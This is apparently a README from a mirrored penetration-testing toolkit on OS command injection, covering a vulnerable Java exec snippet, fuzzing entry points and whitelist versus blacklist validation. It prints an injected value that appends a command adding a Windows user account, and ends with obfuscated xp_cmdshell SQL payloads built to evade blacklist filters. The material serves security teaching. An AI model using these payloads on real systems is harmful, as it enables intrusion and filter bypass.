Git-Mirrors/sec-pentesting-toolkit
1
0
Fork 0
mirror of https://github.com/autistic-symposium/sec-pentesting-toolkit.git synced 2025-04-27 19:16:08 -04:00
Code Issues Packages Projects Releases Wiki Activity
sec-pentesting-toolkit/Web_Security/OS_Command_Injection/README.md
Mari Wahl a36bde60b7 WebHacking: README, urllib2 scripts
2014-12-29 13:06:07 -05:00

2.8 KiB
Raw Blame History

OS Command Injection

  • Methodology:

    • Identify data entry points
    • Inject data (payloads)
    • Detect anomalies from the response.
    • Automate

  • For example for snippet:

String cmd = new String("cmd.exe /K processReports.bat clientId=" + input.getValue("ClientId"));
Process proc = Runtime.getRuntime().exec(cmd);

For a client id equal 444, we would have the following string:

cmd.exe /K processReports.bat clientId=444

However, an attacker could run use the client id equal 444 && net user hacked hackerd/add. In this case, we have the following string:

cmd.exe /K processReports.bat clientId=444 && net user hacked hacked /add

Examples of Injection Payloads:

  • Control characters and common attack strings:

    • '-- SQL injection
    • && | OS Command Injection
    • <> XSS

  • Long strings (AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA)

  • Binary or Null data

Fuzz Testing Web Applications

  • Focus on the relevant attack surface of the web application.

  • Typically HTTP request parameters:

    • QueryString
    • POST data
    • Cookies
    • Other HTTP headers (User-Agent, Referer)

  • Other entry points with request structures:

    • XML web services
    • WCF, GWT, AMF
    • Remote Method Invocation (RMI)

  • Fixing injection flaws:

    • Comprehensive, consistent server-side input validation
    • User Safe command APIs
    • Avoid concatenating strings passed to an interpreter
    • Use strong data types in favor of strings

Whitelist input validation

  • Input validated against known GOOD values.

  • Exact match: * A specific list of exact values is defined * Difficult when large set of values is expected

  • Pattern matching: * Values are matched against known good input patterns. * Data type, regular expressions, etc.

Blacklist input validation

  • Input validated against known BAD values.
  • Not as effective as whitelist validation. * Susceptible to bypass via encoding * Global protection and therefore often not aware of context.
  • Constantly changing given dynamic of application attacks.

Evading Blacklist filters

Exploit payloads:

';exec xp_cmdshell 'dir';--

;Declare @cmd as varchar(3000);Set @cmd =
 x+'p+'_+'c+'m+'d+s+'h+'e+'l+'l+'/**/+””+d+i'+r+””;exec(@cmd);--

;ex/**/ec xp_cmds/**/hell dir;--

Declare @cmd as varchar(3000);Set @cmd
=(CHAR(101)+CHAR(120)+CHAR(101)+CHAR(99)+CHAR(32)+CHAR(109)+CHAR(97)+CHAR(115)+CHA
R(116)+CHAR(101)+CHAR(114)+CHAR(46)+CHAR(46)+CHAR(120)+CHAR(112)+CHAR(95)+CHAR(99)+
CHAR(109)+CHAR(100)+CHAR(115)+CHAR(104)+CHAR(101)+CHAR(108)+CHAR(108)+CHAR(32)+CH
AR(39)+CHAR(100)+CHAR(105)+CHAR(114)+CHAR(39)+CHAR(59));EXEC(@cmd);--

;Declare @cmd as varchar(3000);Set @cmd =
 convert(varchar(0),0×78705F636D647368656C6C202764697227);exec(@cmd);--